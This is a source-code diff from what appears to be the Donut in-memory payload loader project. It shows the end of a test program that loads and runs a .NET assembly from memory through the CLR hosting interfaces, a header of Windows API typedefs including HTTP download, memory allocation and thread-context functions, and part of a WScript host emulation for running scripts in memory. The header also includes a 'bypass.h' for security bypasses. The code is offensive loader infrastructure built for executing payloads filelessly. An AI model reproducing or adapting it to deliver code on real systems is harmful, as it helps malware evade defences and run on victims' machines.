261 (mscorlib::BindingFlags_Instance | mscorlib::BindingFlags_Public),
262 &nfo);
263
264 printf("GetEvent(ProcessExit) HRESULT : %08lx EventInfoPtr : %p\n", hr, (void*)nfo);
265
266 hr = nfo->get_EventHandlerType(&evt);
267 printf("EventHandlerType(ProcessExit) : HRESULT : %08lx TypePtr : %p\n", hr, (void*)evt);
268
269 BSTR type_name, base_name;
270 mscorlib::_TypePtr base_type, ref_type;
271
272 evt->get_name(&type_name);
273 evt->get_BaseType(&base_type);
274 base_type->get_name(&base_name);
275
276 wprintf(L"Event Type : %s\nBase Type : %s\n", type_name, base_name);
277
278 printf("my_function = %p\n", (void*)my_function);
279
280 // SAFEARRAY(VARIANT)
281 sav = SafeArrayCreateVector(VT_VARIANT, 0, 2);
282
283 VariantClear(&v_ptr);
284 V_BYREF(&v_ptr) = (PVOID)my_function;
285 V_VT(&v_ptr) = VT_INT;
286
287 idx = 0;
288 SafeArrayPutElement(sav, &idx, &v_ptr);
289
290 BSTR strZ = SysAllocString(L"System.MultiDelegate");
291 hr = as2->GetType_2(strZ, &type);
292 printf("System.Delegate = %lx, %p\n", hr, (void*)type);
293
294 idx = 1;
295 V_VT(&v_type) = VT_UNKNOWN;
296 V_UNKNOWN(&v_type) = type;
297 SafeArrayPutElement(sav, &idx, &type);
298
299 v1.vt = VT_EMPTY;
300 VariantClear(&ret);
301
302 printf("Calling GetDelegateForFunctionPointer\n");
303 hr = mi->Invoke_3(
304 v1,
305 sav, // arguments to method
306 &ret); // return value from method
307
308 printf("Invoke_3(GetDelegateForFunctionPointer) HRESULT : %08lx : %x : %p\n", hr, V_VT(&ret), V_BYREF(&ret));
309
310 /**if(hr != S_OK) {
311 printf("Failed to obtain delegate\n");
312 return;
313 }*/
314
315 printf("Delegate : %p\n", ret.punkVal);
316
317 hr = ret.punkVal->QueryInterface(IID_IUnknown, (void**)&handler);
318 printf("HRESULT : %08lx : %p\n", hr, (void*)handler);
319
320 hr = ad->add_ProcessExit(handler);
321 printf("HRESULT : %08lx\n", hr);
322
323 sab.lLbound = 0;
324 sab.cElements = len;
325 printf("SafeArrayCreate()\n");
326 sa = SafeArrayCreate(VT_UI1, 1, &sab);
327
328 if(sa != NULL) {
329 CopyMemory(sa->pvData, code, len);
330 printf("AppDomain::Load_3()\n");
331 hr = ad->Load_3(sa, &as);
332 if(SUCCEEDED(hr)) {
333 printf("Assembly::get_EntryPoint()\n");
334 hr = as->get_EntryPoint(&mi);
335 if(SUCCEEDED(hr)) {
336 v1.vt = VT_NULL;
337 v1.plVal = NULL;
338 printf("MethodInfo::Invoke_3()\n");
339 hr = mi->Invoke_3(v1, NULL, &v2);
340 mi->Release();
341 }
342 as->Release();
343 }
344 SafeArrayDestroy(sa);
345 }
346 ad->Release();
347 }
348 iu->Release();
349 }
350 icrh->Stop();
351 }
352 icrh->Release();
353 }
354
355 int main(int argc, char *argv[])
356 {
357 void *mem;
358 struct stat fs;
359 FILE *fd;
360
361 if(argc != 2) {
362 printf("usage: rundotnet <.NET assembly>\n");
363 return 0;
364 }
365
366 // 1. get the size of file
367 stat(argv[1], &fs);
368
369 if(fs.st_size == 0) {
370 printf("file is empty.\n");
371 return 0;
372 }
373
374 // 2. try open assembly
375 fd = fopen(argv[1], "rb");
376 if(fd == NULL) {
377 printf("unable to open \"%s\".\n", argv[1]);
378 return 0;
379 }
380 // 3. allocate memory
381 mem = malloc(fs.st_size);
382 if(mem != NULL) {
383 // 4. read file into memory
384 fread(mem, 1, fs.st_size, fd);
385 // 5. run the program from memory
386 rundotnet(mem, fs.st_size);
387 // 6. free memory
388 free(mem);
389 }
390 // 7. close assembly
391 fclose(fd);
392
393 return 0;
394 }
395
396 /**
397 sav = SafeArrayCreateVector(VT_UNKNOWN, 0, 1);
398 BSTR i32 = SysAllocString(L"System.Int32");
399
400 as2->GetType_2(i32, &ptr);
401 idx = 0;
402 SafeArrayPutElement(sav, &idx, ptr);
403
404 BSTR alloc = SysAllocString(L"AllocHGlobal");
405 BSTR marshal = SysAllocString(L"System.Runtime.InteropServices.Marshal");
406 hr = as1->GetType_2(marshal, &mars);
407
408 hr = mars->GetMethod(alloc,
409 (mscorlib::BindingFlags)
410 (mscorlib::BindingFlags_Static | mscorlib::BindingFlags_Public),
411 NULL, // Binder
412 sav, // SAFEARRAY(_Type*)
413 NULL, // Modifiers
414 &mi); // MethodInfo
415
416 printf("System.Runtime.InteropServices.Marshal.GetMethod(AllocCoTaskMem) : %lx\n", hr);
417
418 sav = SafeArrayCreateVector(VT_VARIANT, 0, 1);
419 idx = 0;
420 V_VT(&v_type) = VT_I4;
421 V_I4(&v_type) = 0x12345678;
422 SafeArrayPutElement(sav, &idx, &v_type);
423
424 v1.vt = VT_EMPTY;
425 VariantClear(&ret);
426
427 printf("Press any key to continue...\n");
428 getchar();
429
430 printf("Calling AllocCoTaskMem\n");
431 hr = mi->Invoke_3(
432 v1,
433 sav, // arguments to method
434 &ret); // return value from method
435
436 printf("%lx %p\n", hr, (LPVOID)V_BYREF(&ret));
437 getchar();
438 return;
439 */
+534
-0
loader/winapi.h less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #ifndef WINAPI_H
32 #define WINAPI_H
33
34 #include <windows.h>
35 #include "bypass.h" //For the structs necessary for each bypass
36
37 typedef LPVOID (WINAPI *HeapAlloc_t)(
38 HANDLE hHeap,
39 DWORD dwFlags,
40 SIZE_T dwBytes);
41
42 typedef BOOL (WINAPI *HeapFree_t)(
43 HANDLE hHeap,
44 DWORD dwFlags,
45 LPVOID lpMem);
46
47 typedef HANDLE (WINAPI *GetProcessHeap_t)();
48 typedef DWORD (WINAPI *GetLastError_t)();
49
50 typedef LPVOID (WINAPI *HeapReAlloc_t)(
51 HANDLE hHeap,
52 DWORD dwFlags,
53 LPVOID lpMem,
54 SIZE_T dwBytes);
55
56 typedef LPSTR (WINAPI *GetCommandLineA_t)(VOID);
57 typedef LPWSTR (WINAPI *GetCommandLineW_t)(VOID);
58
59 typedef void (WINAPI *Sleep_t)(DWORD dwMilliseconds);
60
61 typedef int (WINAPI *MultiByteToWideChar_t)(
62 UINT CodePage,
63 DWORD dwFlags,
64 LPCCH lpMultiByteStr,
65 int cbMultiByte,
66 LPWSTR lpWideCharStr,
67 int cchWideChar);
68
69 typedef int (WINAPI *WideCharToMultiByte_t)(
70 UINT CodePage,
71 DWORD dwFlags,
72 LPCWCH lpWideCharStr,
73 int cchWideChar,
74 LPSTR lpMultiByteStr,
75 int cbMultiByte,
76 LPCCH lpDefaultChar,
77 LPBOOL lpUsedDefaultChar);
78
79 typedef LPWSTR* (WINAPI *CommandLineToArgvW_t)(LPCWSTR lpCmdLine, int* pNumArgs);
80
81 typedef HANDLE (WINAPI *GetCurrentProcess_t)();
82
83 // imports from shlwapi.dll
84 typedef LSTATUS (WINAPI *SHGetValueA_t)(
85 HKEY hkey,
86 LPCSTR pszSubKey,
87 LPCSTR pszValue,
88 DWORD *pdwType,
89 void *pvData,
90 DWORD *pcbData);
91
92 // imports from mscoree.dll
93 typedef HRESULT (WINAPI *CLRCreateInstance_t)(
94 REFCLSID clsid,
95 REFIID riid,
96 LPVOID *ppInterface);
97
98 typedef HRESULT (WINAPI *CorBindToRuntime_t) (
99 LPCWSTR pwszVersion,
100 LPCWSTR pwszBuildFlavor,
101 REFCLSID rclsid,
102 REFIID riid,
103 LPVOID FAR *ppv);
104
105 // imports from ole32.dll
106 typedef HRESULT (WINAPI *CoInitializeEx_t)(
107 LPVOID pvReserved,
108 DWORD dwCoInit);
109
110 typedef void (WINAPI *CoUninitialize_t)(void);
111
112 typedef HRESULT (WINAPI *CoCreateInstance_t)(
113 REFCLSID rclsid,
114 LPUNKNOWN pUnkOuter,
115 DWORD dwClsContext,
116 REFIID riid,
117 LPVOID *ppv);
118
119 typedef HRESULT (WINAPI *CreateStdDispatch_t)(
120 IUnknown *punkOuter,
121 void *pvThis,
122 ITypeInfo *ptinfo,
123 IUnknown **ppunkStdDisp);
124
125 typedef HRESULT (WINAPI *CreateErrorInfo_t)(
126 ICreateErrorInfo **pperrinfo);
127
128 typedef HRESULT (WINAPI *CreateDispTypeInfo_t)(
129 INTERFACEDATA *pidata,
130 LCID lcid,
131 ITypeInfo **pptinfo);
132
133 typedef HRESULT (WINAPI *GetErrorInfo_t)(
134 ULONG dwReserved,
135 IErrorInfo **pperrinfo);
136
137 typedef HRESULT (WINAPI *LoadTypeLib_t)(
138 LPCOLESTR szFile,
139 ITypeLib **pptlib);
140
141 typedef HRESULT (WINAPI *LoadTypeLibEx_t)(
142 LPCOLESTR szFile,
143 REGKIND regkind,
144 ITypeLib **pptlib);
145
146 typedef LCID (WINAPI *GetUserDefaultLCID_t)(VOID);
147
148 // imports from oleaut32.dll
149 typedef HRESULT (WINAPI *SafeArrayGetLBound_t)(
150 SAFEARRAY *psa,
151 UINT nDim,
152 LONG *plLbound);
153
154 typedef HRESULT (WINAPI *SafeArrayGetUBound_t)(
155 SAFEARRAY *psa,
156 UINT nDim,
157 LONG *plUbound);
158
159 typedef SAFEARRAY* (WINAPI *SafeArrayCreate_t)(
160 VARTYPE vt,
161 UINT cDims,
162 SAFEARRAYBOUND *rgsabound);
163
164 typedef SAFEARRAY* (WINAPI *SafeArrayCreateVector_t)(
165 VARTYPE vt,
166 LONG lLbound,
167 ULONG cElements);
168
169 typedef HRESULT (WINAPI *SafeArrayPutElement_t)(
170 SAFEARRAY *psa,
171 LONG *rgIndices,
172 void *pv);
173
174 typedef HRESULT (WINAPI *SafeArrayDestroy_t)(
175 SAFEARRAY *psa);
176
177 typedef BSTR (WINAPI *SysAllocString_t)(
178 const OLECHAR *psz);
179
180 typedef void (WINAPI *SysFreeString_t)(
181 BSTR bstrString);
182
183 // imports from kernel32.dll
184 typedef HMODULE (WINAPI *LoadLibraryA_t)(
185 LPCSTR lpLibFileName);
186
187 typedef FARPROC (WINAPI *GetProcAddress_t)(
188 HMODULE hModule,
189 LPCSTR lpProcName);
190
191 typedef BOOL (WINAPI *AllocConsole_t)(void);
192
193 typedef BOOL (WINAPI *AttachConsole_t)(
194 DWORD dwProcessId);
195
196 typedef BOOL (WINAPI *SetConsoleCtrlHandler_t)(
197 PHANDLER_ROUTINE HandlerRoutine,
198 BOOL Add);
199
200 typedef HANDLE (WINAPI *GetStdHandle_t)(
201 DWORD nStdHandle);
202
203 typedef BOOL (WINAPI *SetStdHandle_t)(
204 DWORD nStdHandle,
205 HANDLE hHandle);
206
207 typedef HANDLE (WINAPI *CreateEventA_t)(
208 LPSECURITY_ATTRIBUTES lpEventAttributes,
209 BOOL bManualReset,
210 BOOL bInitialState,
211 LPCSTR lpName);
212
213 typedef BOOL (WINAPI *SetEvent_t)(HANDLE hEvent);
214
215 typedef DWORD (WINAPI *GetCurrentThreadId_t)(VOID);
216
217 typedef DWORD (WINAPI *GetCurrentProcessId_t)(VOID);
218
219 typedef HHOOK (WINAPI *SetWindowsHookExA_t)(
220 int idHook,
221 HOOKPROC lpfn,
222 HINSTANCE hmod,
223 DWORD dwThreadId);
224
225 typedef BOOL (WINAPI *CreateProcessA_t)(
226 LPCSTR lpApplicationName,
227 LPSTR lpCommandLine,
228 LPSECURITY_ATTRIBUTES lpProcessAttributes,
229 LPSECURITY_ATTRIBUTES lpThreadAttributes,
230 BOOL bInheritHandles,
231 DWORD dwCreationFlags,
232 LPVOID lpEnvironment,
233 LPCSTR lpCurrentDirectory,
234 LPSTARTUPINFOA lpStartupInfo,
235 LPPROCESS_INFORMATION lpProcessInformation);
236
237 // imports from wininet.dll
238 typedef BOOL (WINAPI *InternetCrackUrl_t)(
239 LPCSTR lpszUrl,
240 DWORD dwUrlLength,
241 DWORD dwFlags,
242 LPURL_COMPONENTS lpUrlComponents);
243
244 typedef HINTERNET (WINAPI *InternetOpen_t)(
245 LPCSTR lpszAgent,
246 DWORD dwAccessType,
247 LPCSTR lpszProxy,
248 LPCSTR lpszProxyBypass,
249 DWORD dwFlags);
250
251 typedef HINTERNET (WINAPI *InternetConnect_t)(
252 HINTERNET hInternet,
253 LPCSTR lpszServerName,
254 INTERNET_PORT nServerPort,
255 LPCSTR lpszUserName,
256 LPCSTR lpszPassword,
257 DWORD dwService,
258 DWORD dwFlags,
259 DWORD_PTR dwContext);
260
261 typedef BOOL (WINAPI *InternetQueryDataAvailable_t)(
262 HINTERNET hFile,
263 LPDWORD lpdwNumberOfBytesAvailable,
264 DWORD dwFlags,
265 DWORD_PTR dwContext);
266
267 typedef HINTERNET (WINAPI *HttpOpenRequest_t)(
268 HINTERNET hConnect,
269 LPCSTR lpszVerb,
270 LPCSTR lpszObjectName,
271 LPCSTR lpszVersion,
272 LPCSTR lpszReferrer,
273 LPCSTR *lplpszAcceptTypes,
274 DWORD dwFlags,
275 DWORD_PTR dwContext);
276
277 typedef BOOL (WINAPI *InternetSetOption_t)(
278 HINTERNET hInternet,
279 DWORD dwOption,
280 LPVOID lpBuffer,
281 DWORD dwBufferLength);
282
283 typedef BOOL (WINAPI *HttpSendRequest_t)(
284 HINTERNET hRequest,
285 LPCSTR lpszHeaders,
286 DWORD dwHeadersLength,
287 LPVOID lpOptional,
288 DWORD dwOptionalLength);
289
290 typedef BOOL (WINAPI *HttpQueryInfo_t)(
291 HINTERNET hRequest,
292 DWORD dwInfoLevel,
293 LPVOID lpBuffer,
294 LPDWORD lpdwBufferLength,
295 LPDWORD lpdwIndex);
296
297 typedef BOOL (WINAPI *InternetReadFile_t)(
298 HINTERNET hFile,
299 LPVOID lpBuffer,
300 DWORD dwNumberOfBytesToRead,
301 LPDWORD lpdwNumberOfBytesRead);
302
303 typedef BOOL (WINAPI *InternetCloseHandle_t)(
304 HINTERNET hInternet);
305
306 typedef BOOL (WINAPI *CryptAcquireContext_t)(
307 HCRYPTPROV *phProv,
308 LPCSTR szContainer,
309 LPCSTR szProvider,
310 DWORD dwProvType,
311 DWORD dwFlags);
312
313 typedef void (WINAPI *GetSystemInfo_t)(
314 LPSYSTEM_INFO lpSystemInfo);
315
316 typedef HMODULE (WINAPI *GetModuleHandleA_t)(
317 LPCSTR lpModuleName);
318
319 typedef HMODULE (WINAPI *LoadLibraryExA_t)(
320 LPCSTR lpLibFileName,
321 HANDLE hFile,
322 DWORD dwFlags);
323
324 typedef HMODULE (WINAPI *LoadLibraryExW_t)(
325 LPCWSTR lpLibFileName,
326 HANDLE hFile,
327 DWORD dwFlags);
328
329 typedef BOOL (WINAPI *CryptStringToBinaryA_t)(
330 LPCSTR pszString,
331 DWORD cchString,
332 DWORD dwFlags,
333 BYTE *pbBinary,
334 DWORD *pcbBinary,
335 DWORD *pdwSkip,
336 DWORD *pdwFlags);
337
338 typedef BOOL (WINAPI *CryptDecodeObjectEx_t)(
339 DWORD dwCertEncodingType,
340 LPCSTR lpszStructType,
341 const BYTE *pbEncoded,
342 DWORD cbEncoded,
343 DWORD dwFlags,
344 PCRYPT_DECODE_PARA pDecodePara,
345 void *pvStructInfo,
346 DWORD *pcbStructInfo);
347
348 typedef BOOL (WINAPI *CryptImportPublicKeyInfo_t)(
349 HCRYPTPROV hCryptProv,
350 DWORD dwCertEncodingType,
351 PCERT_PUBLIC_KEY_INFO pInfo,
352 HCRYPTKEY *phKey);
353
354 typedef BOOL (WINAPI *CryptCreateHash_t)(
355 HCRYPTPROV hProv,
356 ALG_ID Algid,
357 HCRYPTKEY hKey,
358 DWORD dwFlags,
359 HCRYPTHASH *phHash);
360
361 typedef BOOL (WINAPI *CryptHashData_t)(
362 HCRYPTHASH hHash,
363 const BYTE *pbData,
364 DWORD dwDataLen,
365 DWORD dwFlags);
366
367 typedef BOOL (WINAPI *CryptVerifySignature_t)(
368 HCRYPTHASH hHash,
369 const BYTE *pbSignature,
370 DWORD dwSigLen,
371 HCRYPTKEY hPubKey,
372 LPCSTR szDescription,
373 DWORD dwFlags);
374
375 typedef BOOL (WINAPI *CryptDestroyHash_t)(
376 HCRYPTHASH hHash);
377
378 typedef BOOL (WINAPI *CryptDestroyKey_t)(
379 HCRYPTKEY hKey);
380
381 typedef BOOL (WINAPI *CryptReleaseContext_t)(
382 HCRYPTPROV hProv,
383 DWORD dwFlags);
384
385 typedef LPVOID (WINAPI *VirtualAlloc_t)(
386 LPVOID lpAddress,
387 SIZE_T dwSize,
388 DWORD flAllocationType,
389 DWORD flProtect);
390
391 typedef BOOL (WINAPI *VirtualFree_t)(
392 LPVOID lpAddress,
393 SIZE_T dwSize,
394 DWORD dwFreeType);
395
396 typedef HLOCAL (WINAPI *LocalFree_t)(
397 HLOCAL hMem);
398
399 typedef HRSRC (WINAPI *FindResource_t)(
400 HMODULE hModule,
401 LPCSTR lpName,
402 LPCSTR lpType);
403
404 typedef HGLOBAL (WINAPI *LoadResource_t)(
405 HMODULE hModule,
406 HRSRC hResInfo);
407
408 typedef LPVOID (WINAPI *LockResource_t)(
409 HGLOBAL hResData);
410
411 typedef DWORD (WINAPI *SizeofResource_t)(
412 HMODULE hModule,
413 HRSRC hResInfo);
414
415 typedef void (WINAPI *RtlZeroMemory_t)(
416 LPVOID Destination,
417 SIZE_T Length);
418
419 typedef BOOL (WINAPI *RtlEqualUnicodeString_t)(
420 PUNICODE_STRING String1,
421 PUNICODE_STRING String2,
422 BOOLEAN CaseInSensitive);
423
424 typedef BOOL (WINAPI *RtlEqualString_t)(
425 const ANSI_STRING * String1,
426 const ANSI_STRING * String2,
427 BOOLEAN CaseInSensitive);
428
429 typedef NTSTATUS (WINAPI *RtlUnicodeStringToAnsiString_t)(
430 PANSI_STRING DestinationString,
431 PUNICODE_STRING SourceString,
432 BOOLEAN AllocateDestinationString);
433
434 typedef void (WINAPI *RtlInitUnicodeString_t)(
435 PUNICODE_STRING DestinationString,
436 PCWSTR SourceString);
437
438 typedef void (WINAPI *RtlExitUserThread_t)(UINT uExitCode);
439
440 typedef void (WINAPI *RtlExitUserProcess_t)(NTSTATUS ExitStatus);
441
442 typedef HANDLE (WINAPI *CreateThread_t)(
443 LPSECURITY_ATTRIBUTES lpThreadAttributes,
444 SIZE_T dwStackSize,
445 LPTHREAD_START_ROUTINE lpStartAddress,
446 LPVOID lpParameter,
447 DWORD dwCreationFlags,
448 LPDWORD lpThreadId);
449
450 typedef HANDLE (WINAPI *CreateFileA_t)(
451 LPCSTR lpFileName,
452 DWORD dwDesiredAccess,
453 DWORD dwShareMode,
454 LPSECURITY_ATTRIBUTES lpSecurityAttributes,
455 DWORD dwCreationDisposition,
456 DWORD dwFlagsAndAttributes,
457 HANDLE hTemplateFile);
458
459 typedef BOOL (WINAPI *RtlCreateUnicodeString_t)(
460 PUNICODE_STRING DestinationString,
461 PCWSTR SourceString);
462
463 typedef NTSTATUS (WINAPI *RtlGetCompressionWorkSpaceSize_t)(
464 USHORT CompressionFormatAndEngine,
465 PULONG CompressBufferWorkSpaceSize,
466 PULONG CompressFragmentWorkSpaceSize);
467
468 typedef NTSTATUS (WINAPI *RtlCompressBuffer_t)(
469 USHORT CompressionFormatAndEngine,
470 PUCHAR UncompressedBuffer,
471 ULONG UncompressedBufferSize,
472 PUCHAR CompressedBuffer,
473 ULONG CompressedBufferSize,
474 ULONG UncompressedChunkSize,
475 PULONG FinalCompressedSize,
476 PVOID WorkSpace);
477
478 typedef NTSTATUS (WINAPI *RtlDecompressBuffer_t)(
479 USHORT CompressionFormatAndEngine,
480 PUCHAR UncompressedBuffer,
481 ULONG UncompressedBufferSize,
482 PUCHAR CompressedBuffer,
483 ULONG CompressedBufferSize,
484 PULONG FinalUncompressedSize);
485
486 typedef NTSTATUS (WINAPI *RtlDecompressBufferEx_t)(
487 USHORT CompressionFormatAndEngine,
488 PUCHAR UncompressedBuffer,
489 ULONG UncompressedBufferSize,
490 PUCHAR CompressedBuffer,
491 ULONG CompressedBufferSize,
492 PULONG FinalUncompressedSize,
493 PVOID WorkSpace);
494
495 typedef NTSTATUS (WINAPI *RtlUserThreadStart_t)(
496 LPTHREAD_START_ROUTINE lpStartAddress,
497 LPVOID lpParameter);
498
499 typedef NTSTATUS (WINAPI *NtContinue_t)(
500 PCONTEXT ContextRecord,
501 BOOLEAN TestAlert);
502
503 typedef enum _SECTION_INHERIT {
504 ViewShare = 1,
505 ViewUnmap = 2
506 } SECTION_INHERIT, * PSECTION_INHERIT;
507
508 typedef BOOL (WINAPI *SetThreadContext_t)(
509 HANDLE hThread,
510 const CONTEXT *lpContext);
511
512 typedef BOOL (WINAPI *GetThreadContext_t)(
513 HANDLE hThread,
514 LPCONTEXT lpContext);
515
516 typedef HANDLE (WINAPI *GetCurrentThread_t)(VOID);
517
518 typedef PVOID (WINAPI *AddVectoredExceptionHandler_t)(
519 ULONG First,
520 PVECTORED_EXCEPTION_HANDLER Handler);
521
522 typedef ULONG (WINAPI *RemoveVectoredExceptionHandler_t)(
523 PVOID Handle);
524
525 typedef PVOID (WINAPI *AddVectoredContinueHandler_t)(
526 ULONG First,
527 PVECTORED_EXCEPTION_HANDLER Handler);
528
529 typedef ULONG (WINAPI *RemoveVectoredContinueHandler_t)(PVOID Handle);
530
531 #endif
532
533
+343
-0
loader/wscript.c less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 // initialize interface with methods/properties
32 static HRESULT Host_New(PDONUT_INSTANCE inst, IHost *host) {
33 HRESULT hr;
34 WCHAR buf[DONUT_MAX_NAME+1];
35
36 // IUnknown interface
37 host->lpVtbl->QueryInterface = ADR(LPVOID, Host_QueryInterface);
38 host->lpVtbl->AddRef = ADR(LPVOID, Host_AddRef);
39 host->lpVtbl->Release = ADR(LPVOID, Host_Release);
40
41 // IDispatch interface
42 host->lpVtbl->GetTypeInfoCount = ADR(LPVOID, Host_GetTypeInfoCount);
43 host->lpVtbl->GetTypeInfo = ADR(LPVOID, Host_GetTypeInfo);
44 host->lpVtbl->GetIDsOfNames = ADR(LPVOID, Host_GetIDsOfNames);
45 host->lpVtbl->Invoke = ADR(LPVOID, Host_Invoke);
46
47 // IHost interface
48 host->lpVtbl->get_Name = ADR(LPVOID, Host_get_Name);
49 host->lpVtbl->get_Application = ADR(LPVOID, Host_get_Application);
50 host->lpVtbl->get_FullName = ADR(LPVOID, Host_get_FullName);
51 host->lpVtbl->get_Path = ADR(LPVOID, Host_get_Path);
52 host->lpVtbl->get_Interactive = ADR(LPVOID, Host_get_Interactive);
53 host->lpVtbl->put_Interactive = ADR(LPVOID, Host_put_Interactive);
54 host->lpVtbl->Quit = ADR(LPVOID, Host_Quit);
55 host->lpVtbl->get_ScriptName = ADR(LPVOID, Host_get_ScriptName);
56 host->lpVtbl->get_ScriptFullName = ADR(LPVOID, Host_get_ScriptFullName);
57 host->lpVtbl->get_Arguments = ADR(LPVOID, Host_get_Arguments);
58 host->lpVtbl->get_Version = ADR(LPVOID, Host_get_Version);
59 host->lpVtbl->get_BuildVersion = ADR(LPVOID, Host_get_BuildVersion);
60 host->lpVtbl->get_Timeout = ADR(LPVOID, Host_get_Timeout);
61 host->lpVtbl->put_Timeout = ADR(LPVOID, Host_put_Timeout);
62 host->lpVtbl->CreateObject = ADR(LPVOID, Host_CreateObject);
63 host->lpVtbl->Echo = ADR(LPVOID, Host_Echo);
64 host->lpVtbl->GetObject = ADR(LPVOID, Host_GetObject);
65 host->lpVtbl->DisconnectObject = ADR(LPVOID, Host_DisconnectObject);
66 host->lpVtbl->Sleep = ADR(LPVOID, Host_Sleep);
67 host->lpVtbl->ConnectObject = ADR(LPVOID, Host_ConnectObject);
68 host->lpVtbl->get_StdIn = ADR(LPVOID, Host_get_StdIn);
69 host->lpVtbl->get_StdOut = ADR(LPVOID, Host_get_StdOut);
70 host->lpVtbl->get_StdErr = ADR(LPVOID, Host_get_StdErr);
71
72 host->m_cRef = 0;
73 host->inst = inst;
74
75 DPRINT("LoadTypeLib(\"%s\")", inst->wscript_exe);
76 ansi2unicode(inst, inst->wscript_exe, buf);
77 hr = inst->api.LoadTypeLib(buf, &host->lpTypeLib);
78
79 if(hr == S_OK) {
80 DPRINT("ITypeLib::GetTypeInfoOfGuid");
81
82 hr = host->lpTypeLib->lpVtbl->GetTypeInfoOfGuid(
83 host->lpTypeLib, &inst->xIID_IHost, &host->lpTypeInfo);
84 }
85 DPRINT("HRESULT : %08lx", hr);
86 return hr;
87 }
88
89 // Queries a COM object for a pointer to one of its interface.
90 static HRESULT WINAPI Host_QueryInterface(IHost *iface, REFIID riid, void **ppv) {
91 DPRINT("WScript::QueryInterface");
92
93 if(ppv == NULL) return E_POINTER;
94
95 // we implement the following interfaces
96 if(IsEqualIID(&iface->inst->xIID_IUnknown, riid) ||
97 IsEqualIID(&iface->inst->xIID_IDispatch, riid) ||
98 IsEqualIID(&iface->inst->xIID_IHost, riid))
99 {
100 *ppv = iface;
101 return S_OK;
102 }
103 *ppv = NULL;
104 return E_NOINTERFACE;
105 }
106
107 // Increments the reference count for an interface pointer to a COM object.
108 static ULONG WINAPI Host_AddRef(IHost *iface) {
109 DPRINT("WScript::AddRef");
110
111 _InterlockedIncrement(&iface->m_cRef);
112 return iface->m_cRef;
113 }
114
115 // Decrements the reference count for an interface on a COM object.
116 static ULONG WINAPI Host_Release(IHost *iface) {
117 DPRINT("WScript::Release");
118
119 ULONG ref = _InterlockedDecrement(&iface->m_cRef);
120 return ref;
121 }
122
123 // Retrieves the number of type information interfaces that an object provides (either 0 or 1).
124 static HRESULT WINAPI Host_GetTypeInfoCount(IHost *iface, UINT *pctinfo) {
125 DPRINT("WScript::GetTypeInfoCount");
126
127 if(pctinfo == NULL) return E_POINTER;
128
129 *pctinfo = 1;
130 return S_OK;
131 }
132
133 // Retrieves the type information for an object, which can then be used to get the type information for an interface.
134 static HRESULT WINAPI Host_GetTypeInfo(IHost *iface, UINT iTInfo, LCID lcid, ITypeInfo **ppTInfo) {
135 DPRINT("WScript::GetTypeInfo");
136
137 if(ppTInfo == NULL) return E_POINTER;
138
139 iface->lpTypeInfo->lpVtbl->AddRef(iface->lpTypeInfo);
140 *ppTInfo = iface->lpTypeInfo;
141
142 return S_OK;
143 }
144
145 // Maps a single member and an optional set of argument names to a corresponding set of integer DISPIDs,
146 // which can be used on subsequent calls to Invoke.
147 static HRESULT WINAPI Host_GetIDsOfNames(IHost *iface, REFIID riid,
148 LPOLESTR *rgszNames, UINT cNames, LCID lcid, DISPID *rgDispId) {
149 DPRINT("WScript::GetIDsOfNames");
150
151 return iface->lpTypeInfo->lpVtbl->GetIDsOfNames(iface->lpTypeInfo, rgszNames, cNames, rgDispId);
152 }
153
154 // Provides access to properties and methods exposed by an object.
